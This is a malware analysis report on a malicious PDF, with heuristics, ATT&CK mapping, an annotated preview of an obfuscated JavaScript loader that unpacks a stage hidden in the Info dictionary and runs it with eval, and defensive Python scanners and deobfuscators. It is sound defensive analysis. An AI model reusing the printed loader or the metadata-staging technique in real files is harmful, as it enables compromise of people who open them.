Verdict: MALICIOUS (Risk Score 118)
Malware Insights
MITRE ATT&CK
- T1059.007 Command and Scripting Interpreter: JavaScript
- T1203 Exploitation for Client Execution
- T1566.001 Phishing: Spearphishing Attachment
The PDF carries embedded JavaScript, flagged by PDF_JAVASCRIPT, PDF_JS and PDF_JS_EXPLOIT_CLUSTER, alongside an XFA form. The script carved from object 7 is a short obfuscated loader rather than a downloader: it assembles the names "info", "pdftype" and "eval" from throwaway character arrays, reads this.info.pdftype (a custom key in the document's Info dictionary), keeps every fourth character of that string, and hands the result to eval. The second stage is therefore hidden in document metadata, not in the script, and it is not among the carved artifacts. The script references no URL: http://www.bitstream.com was extracted from document text (see Embedded URL below), not from the JavaScript, and is not by itself evidence of a download; Bitstream is a font vendor and the sample embeds an sfnt font, although the report does not tie the two together. Staging a payload in the Info dictionary and unpacking it with eval at open time is a well-known malicious-document technique. The heuristics name no specific CVE, and the file was most likely delivered as a spearphishing attachment.
Machine Learning
- Nyx PDF Classifier: malicious (score 0.9994)
Heuristics (6)
- JavaScript action (low; 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- XFA form (low) PDF_XFA: PDF uses XML Forms Architecture, which can contain script logic.
- Object number defined twice with different bodies (info) PDF_DUPLICATE_OBJ_BODY_INCREMENTAL: The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.bitstream.com (in PDF document text)
  - http://ns.adobe.com/xdp/ (in PDF document text)
  - http://www.xfa.org/schema/xci/2.6/ (in PDF document text)
  - http://www.xfa.org/schema/xfa-template/2.6/ (in PDF document text)
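The duplicate-object rule above is easy to reproduce by hand. The following is an added example (editor's code, not the analyzer's implementation of PDF_DUPLICATE_OBJ_BODY_INCREMENTAL): a regex-level scanner that collects every `N G obj ... endobj` definition, ignores byte-identical re-saves, reports what a first-wins and a last-wins reader would each resolve, and raises severity only when one of the differing bodies carries active content. The active-content name list, the severity labels and the two-revision sample PDF (hand-built, xref tables omitted) are this example's own assumptions.

```python
import re

# Regex-level scan: sufficient for the classic "N G obj ... endobj" layout.
# Caveats: object streams are not parsed, and a stream whose bytes contain
# "endobj" would cut a body short; a production scanner should honour /Length.
OBJ_RE = re.compile(rb"(?<![0-9])(\d+)[ \t\r\n]+(\d+)[ \t\r\n]+obj\b(.*?)endobj", re.DOTALL)

# Names that make a redefined object "active content" (example's own list).
ACTIVE_RE = re.compile(rb"/(JavaScript|JS|XFA|OpenAction|AA|Launch|RichMedia)(?![A-Za-z0-9])")


def find_duplicate_objects(pdf: bytes) -> list:
    """Report indirect objects defined more than once with differing bodies.

    Byte-identical re-definitions (an ordinary incremental save) are ignored.
    Severity is 'info' unless one of the bodies carries active content.
    """
    definitions = {}  # (num, gen) -> [(offset, body), ...] in file order
    for m in OBJ_RE.finditer(pdf):
        key = (int(m.group(1)), int(m.group(2)))
        definitions.setdefault(key, []).append((m.start(), m.group(3).strip()))

    findings = []
    for (num, gen), bodies in definitions.items():
        if len({body for _, body in bodies}) < 2:
            continue  # single definition or identical copies
        active = sorted({n.decode() for _, body in bodies for n in ACTIVE_RE.findall(body)})
        findings.append({
            "object": f"{num} {gen}",
            "definitions": len(bodies),
            "offsets": [off for off, _ in bodies],
            "first_wins": bodies[0][1],   # what a first-definition-wins reader sees
            "last_wins": bodies[-1][1],   # what a last-definition-wins reader sees
            "active_content": active,
            "severity": "high" if active else "info",
        })
    return findings


# Constructed sample: an original revision followed by one incremental update.
# The update makes a benign page edit (object 3), re-saves object 2 unchanged,
# swaps object 7 from a font to a JavaScript action, and points the new catalog
# at it via /OpenAction. A first-wins reader sees a font and no OpenAction.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /Rotate 0 >>\nendobj\n"
    b"7 0 obj\n<< /Type /Font /Subtype /TrueType /BaseFont /Arial >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /Rotate 90 >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"7 0 obj\n<< /S /JavaScript /JS (this.eval(this.info.pdftype)) >>\nendobj\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 7 0 R >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R /Prev 9 >>\n%%EOF\n"
)


if __name__ == "__main__":
    for f in find_duplicate_objects(SAMPLE_PDF):
        print(f'{f["object"]} obj: {f["definitions"]} definitions, severity={f["severity"]}, '
              f'active={f["active_content"]}')
        print("   first-wins:", f["first_wins"].decode(errors="replace"))
        print("   last-wins: ", f["last_wins"].decode(errors="replace"))
```

Run against the sample, object 2 is silently skipped, object 3 is reported at `info` (a body-only difference), and objects 1 and 7 are raised to `high` because the later bodies introduce `/OpenAction` and `/JavaScript`. The first-wins/last-wins pair is the useful part of the output: it is exactly the divergence a scanner that stops at the first definition would miss.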
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0007_000.js | b009cf33017e0bf5af24d8cf419cf995a84f7f8eb3e069fb7101b8b2ab8c0878 | pdf-javascript-stream | PDF /JS object 7 at offset 0x874 | 1016 bytes |
| font_00_sfnt_off000010ed.bin | 044efaa0fcddad6a1afc97a6bd112675dff8d542f6a622fb73e7eb17d43d90f7 | pdf-font-stream | PDF embedded font (sfnt) at offset 0x10ED | 65932 bytes |

Preview of javascript_obj0007_000.js (the analyzer shows up to the first 1,000 lines; this script is a single statement chain, reflowed here one statement per line, with comments giving the value each assembled string and lookup resolves to):

```javascript
Yf1w00Ib=this;                                               // the Doc object
xm5T42=['w','3','Z','U','6','s','v','i','H','0','V','C','l','q','n','n','X','f','l','P','U','L','o','S','c','8','0','4'];
JWx6ACn9bA=xm5T42[7]+xm5T42[15]+xm5T42[17]+xm5T42[22];      // "info"
rWeGEt=Yf1w00Ib[JWx6ACn9bA];                                 // this.info (the document Info dictionary)
X03480x=['c','p','z','8','u','d','O','m','U','9','4','v','F','f','h','P','t','y','m','1','y','m','j','4','p','B','W','e','A','7','a','t','y','2'];
gylJi6Dw87=X03480x[1]+X03480x[5]+X03480x[13]+X03480x[16]+X03480x[20]+X03480x[24]+X03480x[27];  // "pdftype"
qL3Q=rWeGEt[gylJi6Dw87];                                     // this.info.pdftype: the hidden stage-2 text
sg7Mmuj="";
SDPeQ3=['L','Y','P','c','D','x','A','h','N','r','r','I','8','a','A','o','q','p','V','r','g','e','C','I','q','Z','A','H','9','1','t','m','F','G','V','9','J','J'];
Yp4yFOO26q=SDPeQ3[3]+SDPeQ3[7]+SDPeQ3[13]+SDPeQ3[19]+SDPeQ3[26]+SDPeQ3[30];   // "charAt" (assembled but never used)
for (i=0;i<qL3Q.length;i +=4){ sg7Mmuj +=qL3Q.charAt(i);}   // keep every 4th character, dropping the filler between them
c6C3pI3=['G','6','B','d','e','m','M','U','4','4','4','v','w','r','z','l','M','G','o','a','j','8','0','l','Q','L','A','U','7'];
wC8oUe1=c6C3pI3[4]+c6C3pI3[11]+c6C3pI3[19]+c6C3pI3[23];     // "eval"
prel=Yf1w00Ib[wC8oUe1];                                      // this.eval
prel(sg7Mmuj);                                               // run the decoded stage 2
```

The loader contains no URL and no shellcode of its own; everything it executes comes from the pdftype entry of the Info dictionary, which the analyzer did not carve. To recover the second stage, dump the Info dictionary from the sample and apply the stride-4 extraction to that value.
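The same resolution can be done statically, without opening the PDF in a reader. The following is an added example (editor's code, not tooling from this report): it parses the loader's character arrays, rebuilds every string assembled by indexing into them, follows the `this[...]` lookups to dotted paths such as `this.info.pdftype`, reads the step of the `charAt` loop, and replays the extraction against an Info value. The LOADER text is the script extracted above; STAGE2 and INFO_PDFTYPE are constructed stand-ins, because the real pdftype entry is not included in the report.

```python
import re

# The loader carved from object 7, verbatim, split at statement boundaries.
LOADER = (
    "Yf1w00Ib=this;"
    "xm5T42=['w','3','Z','U','6','s','v','i','H','0','V','C','l','q','n','n','X','f','l','P','U','L','o','S','c','8','0','4'];"
    "JWx6ACn9bA=xm5T42[7]+xm5T42[15]+xm5T42[17]+xm5T42[22];"
    "rWeGEt=Yf1w00Ib[JWx6ACn9bA];"
    "X03480x=['c','p','z','8','u','d','O','m','U','9','4','v','F','f','h','P','t','y','m','1','y','m','j','4','p','B','W','e','A','7','a','t','y','2'];"
    "gylJi6Dw87=X03480x[1]+X03480x[5]+X03480x[13]+X03480x[16]+X03480x[20]+X03480x[24]+X03480x[27];"
    "qL3Q=rWeGEt[gylJi6Dw87];"
    ' sg7Mmuj="";'
    "SDPeQ3=['L','Y','P','c','D','x','A','h','N','r','r','I','8','a','A','o','q','p','V','r','g','e','C','I','q','Z','A','H','9','1','t','m','F','G','V','9','J','J'];"
    "Yp4yFOO26q=SDPeQ3[3]+SDPeQ3[7]+SDPeQ3[13]+SDPeQ3[19]+SDPeQ3[26]+SDPeQ3[30];"
    "for (i=0;i<qL3Q.length;i +=4){ sg7Mmuj +=qL3Q.charAt(i);}"
    "c6C3pI3=['G','6','B','d','e','m','M','U','4','4','4','v','w','r','z','l','M','G','o','a','j','8','0','l','Q','L','A','U','7'];"
    "wC8oUe1=c6C3pI3[4]+c6C3pI3[11]+c6C3pI3[19]+c6C3pI3[23];"
    "prel=Yf1w00Ib[wC8oUe1];"
    "prel(sg7Mmuj);"
)

# Syntactic shapes the loader uses; only these are resolved, nothing is executed.
ARRAY_RE = re.compile(r"(\w+)=\[((?:'[^']*'\s*,?\s*)+)\];")            # name=['a','b',...];
CONCAT_RE = re.compile(r"(\w+)=((?:\w+\[\d+\]\s*\+?\s*)+);")            # name=arr[i]+arr[j]...;
MEMBER_RE = re.compile(r"(\w+)=(\w+)\[(\w+)\];")                        # alias=obj[nameVar];
STRIDE_RE = re.compile(r"for\s*\(\s*i=0;\s*i<(\w+)\.length;\s*i\s*\+=\s*(\d+)\s*\)")


def resolve_strings(script: str) -> dict:
    """Rebuild every string assembled by indexing into the character arrays."""
    arrays = {name: re.findall(r"'([^']*)'", body) for name, body in ARRAY_RE.findall(script)}
    strings = {}
    for var, expr in CONCAT_RE.findall(script):
        parts = re.findall(r"(\w+)\[(\d+)\]", expr)
        if parts and all(arr in arrays for arr, _ in parts):
            strings[var] = "".join(arrays[arr][int(idx)] for arr, idx in parts)
    return strings


def resolve_members(script: str, strings: dict) -> dict:
    """Follow alias=obj[name] chains so each variable maps to a dotted path (this.info.pdftype)."""
    paths = {var: "this" for var in re.findall(r"(\w+)=this;", script)}
    for var, obj, key in MEMBER_RE.findall(script):
        if obj in paths and key in strings:
            paths[var] = paths[obj] + "." + strings[key]
    return paths


def stride_of(script: str) -> int:
    """Step of the charAt() extraction loop (1 if the script has no such loop)."""
    m = STRIDE_RE.search(script)
    return int(m.group(2)) if m else 1


def decode_stage2(info_value: str, stride: int) -> str:
    """Replay the extraction loop: keep every stride-th character of the hidden Info entry."""
    return info_value[::stride]


def analyze(script: str) -> dict:
    """Static summary: resolved strings, dotted paths, loop stride and which path is finally called."""
    strings = resolve_strings(script)
    paths = resolve_members(script, strings)
    calls = [(fn, paths[fn]) for fn, _ in re.findall(r"(\w+)\((\w+)\);", script) if fn in paths]
    return {"strings": strings, "paths": paths, "stride": stride_of(script), "calls": calls}


# Constructed stand-in for the Info dictionary entry: each real character is
# followed by three filler characters, matching the stride-4 loop above.
STAGE2 = "app.alert('stage 2 would run here');"
INFO_PDFTYPE = "".join(c + "%x#" for c in STAGE2)


if __name__ == "__main__":
    report = analyze(LOADER)
    for var, path in report["paths"].items():
        print(f"{var:>10} -> {path}")
    print("calls:", report["calls"], "stride:", report["stride"])
    print("decoded stage 2:", decode_stage2(INFO_PDFTYPE, report["stride"]))
```

Against the extracted loader this yields the four assembled names (info, pdftype, charAt, eval), the path chain `this.info.pdftype`, a stride of 4 and a single call `prel` resolving to `this.eval`, which is what justifies the exploit-cluster rating even though the script itself contains no eval literal. Feeding the real pdftype value from the sample's Info dictionary into `decode_stage2` with that stride recovers the second stage for separate analysis.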